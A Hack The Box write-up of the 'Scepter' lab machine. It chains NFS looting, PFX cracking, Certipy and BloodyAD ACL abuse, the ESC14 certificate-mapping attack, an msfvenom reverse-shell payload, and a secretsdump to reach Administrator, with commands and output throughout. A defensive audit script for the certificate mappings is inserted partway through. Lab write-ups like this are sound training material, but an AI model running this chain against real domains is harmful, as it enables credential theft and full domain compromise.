muX1337
Scepter

https://app.hackthebox.com/machines/Scepter

Last updated 8 days ago

Recon

Using the htbscan from

[+] Starting recon on 10.10.11.65 (scepter)                                                                                                                                                                                                
[*] Running initial Nmap scan...                                                                                     
sudo nmap -sCV -T4 10.10.11.65 -oA nmap-initial 
[sudo] password for kali:                                                                                            
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-04 21:26 CEST
Nmap scan report for 10.10.11.65       
Host is up (0.020s latency).                                                                                         
Not shown: 985 closed tcp ports (reset)    
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus                                                                         
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-05-05 03:28:13Z)
111/tcp  open  rpcbind       2-4 (RPC #100000)                                                                       
| rpcinfo:  
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind      
|   100000  2,3,4        111/tcp6  rpcbind      
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs     
|   100003  2,3         2049/udp6  nfs                                                                               
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd                                                                            
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status                                                                            
|   100024  1           2049/tcp6  status                                                                            
|   100024  1           2049/udp   status  
|_  100024  1           2049/udp6  status
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn 
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: scepter.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.scepter.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.scepter.htb
| Not valid before: 2024-11-01T03:22:33
|_Not valid after:  2025-11-01T03:22:33
|_ssl-date: 2025-05-05T03:29:03+00:00; +8h01m26s from scanner time.
445/tcp  open  microsoft-ds?            
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: scepter.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.scepter.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.scepter.htb
| Not valid before: 2024-11-01T03:22:33
|_Not valid after:  2025-11-01T03:22:33
|_ssl-date: 2025-05-05T03:29:04+00:00; +8h01m26s from scanner time.
2049/tcp open  nlockmgr      1-4 (RPC #100021)
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: scepter.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-05-05T03:29:03+00:00; +8h01m26s from scanner time.
| ssl-cert: Subject: commonName=dc01.scepter.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.scepter.htb
| Not valid before: 2024-11-01T03:22:33                                                                              
|_Not valid after:  2025-11-01T03:22:33                                                                              
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: scepter.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-05-05T03:29:04+00:00; +8h01m26s from scanner time.
| ssl-cert: Subject: commonName=dc01.scepter.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.scepter.htb
| Not valid before: 2024-11-01T03:22:33   
|_Not valid after:  2025-11-01T03:22:33   
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0                                                                          
|_http-title: Not Found               
5986/tcp open  ssl/http      Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found                                                                                              
|_ssl-date: 2025-05-05T03:29:04+00:00; +8h01m26s from scanner time.
| tls-alpn:                              
|_  http/1.1                             
| ssl-cert: Subject: commonName=dc01.scepter.htb
| Subject Alternative Name: DNS:dc01.scepter.htb
| Not valid before: 2024-11-01T00:21:41    
|_Not valid after:  2025-11-01T00:41:41    
|_http-server-header: Microsoft-HTTPAPI/2.0                                                                          
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows                                                 

Adding the domain controller to our hosts file as well (the latest version of htbscan should do this too).

<machineip> scepter.htb dc01.scepter.htb

NFS Server

We find some certificates and a key on that NFS server. Mount it to /tmp.

➜ showmount -e 10.10.11.65    
Export list for 10.10.11.65:
/helpdesk (everyone)
➜ mkdir nfs
➜ sudo mount -t nfs 10.10.11.65:/helpdesk nfs 
➜ sudo ls -lha nfs
total 21K
drwx------ 2 4294967294 4294967294   64 Nov  2  2024 .
drwx------ 2 4294967294 4294967294   64 Nov  2  2024 ..
-rwx------ 1 4294967294 4294967294 2.5K Nov  2  2024 baker.crt
-rwx------ 1 4294967294 4294967294 2.0K Nov  2  2024 baker.key
-rwx------ 1 4294967294 4294967294 3.3K Nov  2  2024 clark.pfx
-rwx------ 1 4294967294 4294967294 3.3K Nov  2  2024 lewis.pfx
-rwx------ 1 4294967294 4294967294 3.3K Nov  2  2024 scott.pfx

User

We are going to try to crack these certificates using john.

➜ scepter sudo pfx2john nfs/lewis.pfx | tee -a helpdesk/lewishash
lewis.pfx:$pfxng$256$32$2048$8$2ae7b9f39c9e4fb3$30820c8e308206fa06092a86<snipped>
➜ scepter john --wordlist=/usr/share/wordlists/rockyou.txt helpdesk/lewishash 
[...]
newpassword      (lewis.pfx)     

With that password we are able to generate a pfx for baker without any export password, just hit enter. Afterwards we change the owner and group.

➜ sudo openssl pkcs12 -export -out baker.pfx -inkey nfs/baker.key -in nfs/baker.crt -passin pass:newpassword                          

Enter Export Password:
Verifying - Enter Export Password:
➜ sudo chown kali:kali baker.pfx 

Syncing our clock (not necessarily needed twice) and authenticating with the cert.

➜ sudo ntpdate 10.10.11.65
➜ sudo ntpdate 10.10.11.65 | certipy-ad auth -pfx baker.pfx -dc-ip 10.10.11.65                       
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: d.baker@scepter.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'd.baker.ccache'
[*] Trying to retrieve NT hash for 'd.baker'
[*] Got hash for 'd.baker@scepter.htb': aad3b435b51404eeaad3b435b51404ee:18b5fb0d99e7a475316213c15b6f22ce

Now we need to add the domain controller to our resolver and use the hash with bloodhound to get an overview of how we can escalate further.

/etc/resolv.conf
nameserver 10.10.11.65
/etc/krb5.conf
[domain_realm]
    .scepter.htb = SCEPTER.HTB
    scepter.htb = SCEPTER.HTB

[libdefaults]
    default_realm = SCEPTER.HTB
    dns_lookup_realm = false
    dns_lookup_kdc = true
    ticket_lifetime = 24h
    forwardable = true

[realms]
    SCEPTER.HTB = {
        kdc = dc01.scepter.htb
        admin_server = dc01.scepter.htb
        default_domain = scepter.htb
    }
➜ sudo bloodhound-python -u 'd.baker' --hashes 'aad3b435b51404eeaad3b435b51404ee:18b5fb0d99e7a475316213c15b6f22ce' -d scepter.htb -dc dc01.scepter.htb --auth-method ntlm -c All --zip --disable-autogc

INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: scepter.htb
INFO: Connecting to LDAP server: dc01.scepter.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.scepter.htb
INFO: Found 11 users
INFO: Found 57 groups
INFO: Found 2 gpos
INFO: Found 3 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc01.scepter.htb
INFO: Done in 00M 04S
INFO: Compressing output into 20250508084312_bloodhound.zip

If you haven't installed it already here are the steps:

➜ sudo apt -y install bloodhound
Installing:
  bloodhound

Installing dependencies:
  binfmt-support  fastjar  jarwrapper  neo4j

Start neo4j, then open the link and change the password. Afterwards we start bloodhound in a new terminal and just drop our zip file into it. When the import is done we can use the search.

➜ sudo neo4j console
Directories in use:
home:         /usr/share/neo4j
config:       /usr/share/neo4j/conf
[..]
2025-05-08 06:55:32.179+0000 INFO  Bolt enabled on localhost:7687.
2025-05-08 06:55:32.856+0000 INFO  Remote interface available at http://localhost:7474/
[open browser and change password]
➜ bloodhound 
[drop zip-file into bloodhound]

When we enter the user Baker in the search, select him and check the shortest path.

After this we check these nodes; when we right-click Carter we see an interesting action, "ForceChangePassword".

So let's do this.

➜ impacket-changepasswd 'scepter.htb'/'a.carter'@10.10.11.65 -reset -altuser 'd.baker' -althash :'18b5fb0d99e7a475316213c15b6f22ce'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

New password: Password123
Retype new password: Password123
[*] Setting the password of scepter.htb\a.carter as scepter.htb\d.baker
[*] Connecting to DCE/RPC as scepter.htb\d.baker
[*] Password was changed successfully.
[!] User no longer has valid AES keys for Kerberos, until they change their password again.

Another bloodhound run with the new user and credentials.

➜ sudo bloodhound-python -u 'a.carter' -p 'Password123' -d scepter.htb -dc dc01.scepter.htb --auth-method ntlm -c All --zip --disable-autogc
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: scepter.htb
INFO: Connecting to LDAP server: dc01.scepter.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.scepter.htb
INFO: Found 11 users
INFO: Found 57 groups
INFO: Found 2 gpos
INFO: Found 3 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc01.scepter.htb
INFO: Done in 00M 08S
INFO: Compressing output into 20250508083614_bloodhound.zip

We are now in a group called staff access certificate

➜ scepter impacket-changepasswd 'scepter.htb'/'a.carter'@10.10.11.65 -reset -altuser 'd.baker' -althash :'18b5fb0d99e7a475316213c15b6f22ce'
                                                           
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
                                                           
New password:                                 
Retype new password:                        
[*] Setting the password of scepter.htb\a.carter as scepter.htb\d.baker                                  
[*] Connecting to DCE/RPC as scepter.htb\d.baker
[*] Password was changed successfully.
[!] User no longer has valid AES keys for Kerberos, until they change their password again.
➜ scepter sudo ntpdate 10.10.11.65 | impacket-getTGT -no-Password123 -hashes :18b5fb0d99e7a475316213c15b6f22ce scepter.htb/'d.baker'@dc01.scepter.htb
                                                           
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
                                                           
usage: getTGT.py [-h] [-ts] [-debug] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-dc-ip ip address] [-service SPN] [-principalType [PRINCIPALTYPE]] identity
getTGT.py: error: unrecognized arguments: -no-Password123
➜ scepter sudo ntpdate 10.10.11.65 | impacket-getTGT -no-pass -hashes :18b5fb0d99e7a475316213c15b6f22ce scepter.htb/'d.baker'@dc01.scepter.htb
                                                           
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies                                                
                                                           
[*] Saving ticket in d.baker@dc01.scepter.htb.ccache                                                                  
➜ scepter export KRB5CCNAME=d.baker@dc01.scepter.htb.ccache
➜ scepter sudo ntpdate -u 10.10.11.65 | bloodyAD -d scepter.htb -u d.baker -k --host dc01.scepter.htb --dc-ip 10.10.11.65 set password a.carter Password123
[+] Password changed successfully!          
➜ scepter sudo ntpdate -u 10.10.11.65 | bloodyAD -d scepter.htb -u a.carter -p Password123 --host dc01.scepter.htb --dc-ip 10.10.11.65 add genericAll "OU=STAFF ACCESS CERTIFICATE,DC=SCEPTER,DC=HTB" a.carter

[+] a.carter has now GenericAll on OU=STAFF ACCESS CERTIFICATE,DC=SCEPTER,DC=HTB
➜ scepter sudo ntpdate -u 10.10.11.65 | bloodyAD -d scepter.htb -u a.carter -p Password123 --host dc01.scepter.htb set object d.baker mail -v h.brown@scepter.htb

[+] d.baker's mail has been updated
➜ scepter sudo ntpdate -u 10.10.11.65 | certipy-ad req -username "d.baker@scepter.htb" -hashes 18b5fb0d99e7a475316213c15b6f22ce -target "dc01.scepter.htb" -ca 'scepter-DC01-CA' -template 'StaffAccessCertificate'

Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[-] Got error: The NETBIOS connection with the remote host timed out.
[-] Use -debug to print a stacktrace
➜ scepter sudo ntpdate -u 10.10.11.65 | certipy-ad req -username "d.baker@scepter.htb" -hashes 18b5fb0d99e7a475316213c15b6f22ce -target "dc01.scepter.htb" -ca 'scepter-DC01-CA' -template 'StaffAccessCertificate'

Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 4
[*] Got certificate without identification
[*] Certificate has no object SID
[*] Saved certificate and private key to 'd.baker.pfx'
➜ scepter sudo ntpdate -u 10.10.11.65 | certipy-ad req -username "d.baker@scepter.htb" -hashes 18b5fb0d99e7a475316213c15b6f22ce -target "dc01.scepter.htb" -ca 'scepter-DC01-CA' -template 'StaffAccessCertificate'

Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[-] Got error: The NETBIOS connection with the remote host timed out.
[-] Use -debug to print a stacktrace
➜ scepter sudo ntpdate -u 10.10.11.65 | certipy-ad auth -pfx d.baker.pfx -domain scepter.htb -dc-ip 10.10.11.65 -username h.brown                                                                                  

Certipy v4.8.2 - by Oliver Lyak (ly4k)

[!] Could not find identification in the provided certificate
[*] Using principal: h.brown@scepter.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'h.brown.ccache'
[*] Trying to retrieve NT hash for 'h.brown'
[*] Got hash for 'h.brown@scepter.htb': aad3b435b51404eeaad3b435b51404ee:4ecf5242092c6fb8c360a08069c75a0c
➜ scepter export KRB5CCNAME=./h.brown.ccache  

➜ scepter sudo ntpdate -u 10.10.11.65 
2025-05-15 01:21:51.653867 (+0200) +28798.893693 +/- 0.009609 10.10.11.65 s1 no-leap
CLOCK: time stepped by 28798.893693
➜ scepter evil-winrm -i dc01.scepter.htb -r scepter.htb -u h.brown
                                         
Evil-WinRM shell v3.7
                                         
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                         
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                         
Warning: User is not needed for Kerberos auth. Ticket will be used
                                         
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\h.brown\Documents> 

Enter the password 'Password123' at the prompts at the beginning.

Copy+Paste
impacket-changepasswd 'scepter.htb'/'a.carter'@10.10.11.65 -reset -altuser 'd.baker' -althash :'18b5fb0d99e7a475316213c15b6f22ce'

sudo ntpdate 10.10.11.65 | impacket-getTGT -no-pass -hashes :18b5fb0d99e7a475316213c15b6f22ce scepter.htb/'d.baker'@dc01.scepter.htb

export KRB5CCNAME=d.baker@dc01.scepter.htb.ccache

sudo ntpdate -u 10.10.11.65 | bloodyAD -d scepter.htb -u d.baker -k --host dc01.scepter.htb --dc-ip 10.10.11.65 set password a.carter Password123

sudo ntpdate -u 10.10.11.65 | bloodyAD -d scepter.htb -u a.carter -p Password123 --host dc01.scepter.htb --dc-ip 10.10.11.65 add genericAll "OU=STAFF ACCESS CERTIFICATE,DC=SCEPTER,DC=HTB" a.carter

sudo ntpdate -u 10.10.11.65 | bloodyAD -d scepter.htb -u a.carter -p Password123 --host dc01.scepter.htb set object d.baker mail -v h.brown@scepter.htb

sudo ntpdate -u 10.10.11.65 | certipy-ad req -username "d.baker@scepter.htb" -hashes 18b5fb0d99e7a475316213c15b6f22ce -target "dc01.scepter.htb" -ca 'scepter-DC01-CA' -template 'StaffAccessCertificate'

sudo ntpdate -u 10.10.11.65 | certipy-ad auth -pfx d.baker.pfx -domain scepter.htb -dc-ip 10.10.11.65 -username h.brown

export KRB5CCNAME=./h.brown.ccache  

sudo ntpdate -u 10.10.11.65     

evil-winrm -i dc01.scepter.htb -r scepter.htb -u h.brown

Root

Getting a stable meterpreter session. Creating our payload with msfvenom and starting our listener in metasploit.

change <ip>
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ip> LPORT=4243 -f exe -o shell.exe

➜ scepter msfconsole 
Metasploit tip: Use the analyze command to suggest runnable modules for 
hosts
                                                  


       =[ metasploit v6.4.50-dev                          ]
+ -- --=[ 2496 exploits - 1283 auxiliary - 431 post       ]
+ -- --=[ 1610 payloads - 49 encoders - 13 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit Documentation: https://docs.metasploit.com/

msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set lhost tun0
lhost => tun0
msf6 exploit(multi/handler) > set lport 4243
lport => 4243
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run -j

Uploading our payload and executing it

*Evil-WinRM* PS C:\Users\h.brown\Downloads> upload shell.exe
                                        
Info: Uploading /mnt/e/hacking/hackthebox/Machines/scepter/shell.exe to C:\Users\h.brown\Downloads\shell.exe
                                        
Data: 9556 bytes of 9556 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\h.brown\Downloads> ./shell.exe
*Evil-WinRM* PS C:\Users\h.brown\Downloads> 
msf6 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type                     Information             Connection
  --  ----  ----                     -----------             ----------
  1         meterpreter x64/windows  SCEPTER\h.brown @ DC01  <ip>:4243 -> 10.10.11.65:52384 (10.10.11.65)

msf6 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > 

Creating a new computer account and analyzing the X.509 certificate.

➜ sudo ntpdate -u 10.10.11.65 | bloodyAD --host dc01.scepter.htb -d scepter.htb -u a.carter -p 'Password123' --dc-ip 10.10.11.65 add computer meow 'Password123'
[+] meow created
➜ certipy-ad req -ca scepter-DC01-CA -template Machine -target 10.10.11.65 -username meow$ -password 'Password123'                          
Certipy v4.8.2 - by Oliver Lyak (ly4k)
                                                           
[*] Requesting certificate via RPC                 
[*] Successfully requested certificate 
[*] Request ID is 11                                                                                                  
[*] Got certificate with DNS Host Name 'meow.scepter.htb'
[*] Certificate object SID is 'S-1-5-21-74879546-916818434-740295365-9102'
[*] Saved certificate and private key to 'meow.pfx'
➜ certipy-ad cert -pfx meow.pfx -nokey -out "meow.crt"
Certipy v4.8.2 - by Oliver Lyak (ly4k)                  
                                                           
[*] Writing certificate and  to 'meow.crt'
➜ openssl x509 -in meow.crt -noout -text                                                                      
Certificate:                                                                                                          
    Data:                                                                                                             
        Version: 3 (0x2)                                                                                              
        Serial Number:                                                                                                
            62:00:00:00:0e:2d:24:d9:92:4d:f7:a4:cc:00:00:00:00:00:0e
        Signature Algorithm: sha256WithRSAEncryption                                                                  
        Issuer: DC=htb, DC=scepter, CN=scepter-DC01-CA  
    [...]                     

Adding meow.scepter.htb to our hosts-file

conv.py
# conv.py
# Builds the altSecurityIdentities value for an X509 issuer/serial mapping:
#   X509:<I>issuer<SR>serial
# The issuer DN is written root-first (DC=...,CN=...) and the serial is stored
# in reversed byte order, lowercase, without colons.
import argparse

def parse_serial(hex_serial):
    # remove colons and reverse the byte order
    hex_serial = hex_serial.replace(":", "")
    bytes_reversed = [hex_serial[i:i+2] for i in range(0, len(hex_serial), 2)][::-1]
    return ''.join(bytes_reversed).lower()

def format_altsecid(issuer, serial):
    # reverse the RDN order of the LDAP-style issuer DN (CN=...,DC=... -> DC=...,CN=...)
    issuer_parts = issuer.split(',')
    issuer_parts = [p.strip() for p in issuer_parts[::-1]]
    issuer_formatted = ','.join(issuer_parts)
    return f'X509:<I>{issuer_formatted}<SR>{parse_serial(serial)}'

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="Format an altSecurityIdentities X509 mapping")
    parser.add_argument("-serial", required=True, help="serial number as printed by openssl x509 (colon-separated)")
    parser.add_argument("-issuer", required=True, help="issuer DN in LDAP order, e.g. CN=...,DC=...,DC=...")
    args = parser.parse_args()
    print(format_altsecid(args.issuer, args.serial))
Replace the serial number with the one from the openssl output above:
➜ python3 conv.py -serial '62:00:00:00:0e:2d:24:d9:92:4d:f7:a4:cc:00:00:00:00:00:0e' -issuer 'CN=scepter-DC01-CA,DC=scepter,DC=htb'

X509:<I>DC=htb,DC=scepter,CN=scepter-DC01-CA<SR>0e0000000000cca4f74d92d9242d0e00000062
meterpreter Session
msf6 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 4992 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.7136]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Users\h.brown\Downloads>powershell
powershell
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Users\h.brown\Downloads> $map = 'X509:<I>DC=htb,DC=scepter,CN=scepter-DC01-CA<SR>0e0000000000cca4f74d92d9242d0e00000062'
$map = 'X509:<I>DC=htb,DC=scepter,CN=scepter-DC01-CA<SR>0e0000000000cca4f74d92d9242d0e00000062'
PS C:\Users\h.brown\Downloads> Set-ADUser p.adams -Replace @{altSecurityIdentities=$map}
Set-ADUser p.adams -Replace @{altSecurityIdentities=$map}
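From the defender's side, the mapping written above is exactly what an audit of altSecurityIdentities should catch: a strong X509:<I>...<SR>... mapping on p.adams that points at a certificate enrolled by a different principal (meow$). The following is an added example, not part of this write-up; it parses altSecurityIdentities values, classifies them as weak or strong per Microsoft's KB5014754 mapping types, and cross-checks strong mappings against the CA's issued-certificate records. The issuer, serial and requester come from this page; the e.lewis and o.scott mappings are constructed sample data.

```python
import re
from dataclasses import dataclass

# Mapping categories from Microsoft KB5014754: only these three are "strong" (they bind the
# account to one specific certificate or key); the rest can be satisfied by any certificate
# whose subject or e-mail matches, which is why they should not be left on accounts.
STRONG_TYPES = {"IssuerSerialNumber", "SKI", "SHA1PublicKey"}
WEAK_TYPES = {"IssuerSubject", "SubjectOnly", "RFC822"}

_TAG_RE = re.compile(r"<(I|S|SR|SKI|SHA1-PUKEY|RFC822)>([^<]*)")
_TYPE_BY_TAGS = {
    frozenset({"I", "SR"}): "IssuerSerialNumber",
    frozenset({"I", "S"}): "IssuerSubject",
    frozenset({"S"}): "SubjectOnly",
    frozenset({"SKI"}): "SKI",
    frozenset({"SHA1-PUKEY"}): "SHA1PublicKey",
    frozenset({"RFC822"}): "RFC822",
}


def parse_altsecid(value):
    """Split one altSecurityIdentities value into its mapping type and fields (None if malformed)."""
    if not value.startswith("X509:"):
        return None
    tags = _TAG_RE.findall(value[len("X509:"):])
    fields = dict(tags)
    mapping = _TYPE_BY_TAGS.get(frozenset(fields))
    if mapping is None or len(fields) != len(tags):   # unknown combination or repeated tag
        return None
    return {"type": mapping, **fields}


def reversed_serial(serial_hex):
    """openssl prints the serial big-endian with colons; AD stores it byte-reversed, lowercase."""
    raw = serial_hex.replace(":", "").lower()
    return "".join(raw[i:i + 2] for i in range(len(raw) - 2, -1, -2))


def ad_issuer(issuer_ldap_dn):
    """Turn an LDAP-order issuer DN (CN=...,DC=...) into the root-first form AD expects."""
    return ",".join(p.strip() for p in issuer_ldap_dn.split(",")[::-1])


@dataclass
class IssuedCert:
    issuer_dn: str   # LDAP order, e.g. "CN=scepter-DC01-CA,DC=scepter,DC=htb"
    serial: str      # colon-separated, as printed by "openssl x509 -text"
    requester: str   # account that enrolled the certificate, per the CA database


def audit_mappings(accounts, issued):
    """accounts: sAMAccountName -> list of altSecurityIdentities values.
    issued: IssuedCert records from the CA. Returns (account, finding, detail) tuples."""
    by_cert = {(ad_issuer(c.issuer_dn), reversed_serial(c.serial)): c for c in issued}
    findings = []
    for sam, values in accounts.items():
        for value in values:
            parsed = parse_altsecid(value)
            if parsed is None:
                findings.append((sam, "unparseable", value))
            elif parsed["type"] in WEAK_TYPES:
                findings.append((sam, "weak-mapping", parsed["type"]))
            elif parsed["type"] == "IssuerSerialNumber":
                cert = by_cert.get((parsed["I"], parsed["SR"].lower()))
                if cert is None:
                    findings.append((sam, "unknown-certificate", parsed["SR"]))
                elif cert.requester.lower() != sam.lower():
                    # a strong mapping that points at someone else's certificate: the holder
                    # of that certificate can now authenticate as this account
                    findings.append((sam, "mapped-to-foreign-cert", cert.requester))
    return findings


# Constructed sample: issuer, serial and requester are the values shown in this write-up;
# the e.lewis and o.scott mappings are made up to show the weak and unknown cases.
SAMPLE_CERTS = [
    IssuedCert("CN=scepter-DC01-CA,DC=scepter,DC=htb",
               "62:00:00:00:0e:2d:24:d9:92:4d:f7:a4:cc:00:00:00:00:00:0e", "meow$"),
]
SAMPLE_ACCOUNTS = {
    "p.adams": ["X509:<I>DC=htb,DC=scepter,CN=scepter-DC01-CA<SR>0e0000000000cca4f74d92d9242d0e00000062"],
    "h.brown": [],
    "e.lewis": ["X509:<RFC822>e.lewis@scepter.htb"],
    "o.scott": ["X509:<I>DC=htb,DC=scepter,CN=scepter-DC01-CA<SR>0000000000000000000000000000000000000001"],
}

if __name__ == "__main__":
    for finding in audit_mappings(SAMPLE_ACCOUNTS, SAMPLE_CERTS):
        print(finding)
```

In a real environment the account list comes from an LDAP query for altSecurityIdentities and the issued certificates from the CA database (certutil -view), and a "mapped-to-foreign-cert" hit on a privileged account is worth an immediate look.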

➜ sudo ntpdate -u 10.10.11.65                                                                                
2025-05-15 02:12:39.713454 (+0200) +28798.933465 +/- 0.009446 10.10.11.65 s1 no-leap
CLOCK: time stepped by 28798.933465

➜ sudo ntpdate -u 10.10.11.65 | certipy-ad auth -pfx meow.pfx -dc-ip 10.10.11.65 -username p.adams
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[!] The provided username does not match the identification found in the provided certificate: 'P.ADAMS' - 'meow$'
Do you want to continue? (Y/n) [*] Using principal: p.adams@scepter.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'p.adams.ccache'
[*] Trying to retrieve NT hash for 'p.adams'
[*] Got hash for 'p.adams@scepter.htb': aad3b435b51404eeaad3b435b51404ee:1b925c524f447bb821a8789c4b118ce0


➜ python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -just-dc -hashes aad3b435b51404eeaad3b435b51404ee:1b925c524f447bb821a8789c4b118ce0 scepter.htb/p.adams@10.10.11.65
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a291ead3493f9773dc615e66c2ea21c4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:c030fca580038cc8b1100ee37064a4a9:::
scepter.htb\d.baker:1106:aad3b435b51404eeaad3b435b51404ee:18b5fb0d99e7a475316213c15b6f22ce:::
scepter.htb\a.carter:1107:aad3b435b51404eeaad3b435b51404ee:2e24650b1e4f376fa574da438078d200:::
scepter.htb\h.brown:1108:aad3b435b51404eeaad3b435b51404ee:4ecf5242092c6fb8c360a08069c75a0c:::
scepter.htb\p.adams:1109:aad3b435b51404eeaad3b435b51404ee:1b925c524f447bb821a8789c4b118ce0:::
scepter.htb\e.lewis:2101:aad3b435b51404eeaad3b435b51404ee:628bf1914e9efe3ef3a7a6e7136f60f3:::
scepter.htb\o.scott:2102:aad3b435b51404eeaad3b435b51404ee:3a4a844d2175c90f7a48e77fa92fce04:::
scepter.htb\M.clark:2103:aad3b435b51404eeaad3b435b51404ee:8db1c7370a5e33541985b508ffa24ce5:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:0a4643c21fd6a17229b18ba639ccfd5f:::
[*] Kerberos keys grabbed
[*] Cleaning up... 

➜ evil-winrm -i scepter.htb -u administrator -H a291ead3493f9773dc615e66c2ea21c4
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
cb7063f998324a7fe9d129f6f6db3d32
*Evil-WinRM* PS C:\Users\Administrator\Desktop> 

Checking our results with for kali.

Reference: ADCS ESC14 Abuse Technique, Posts By SpecterOps Team Members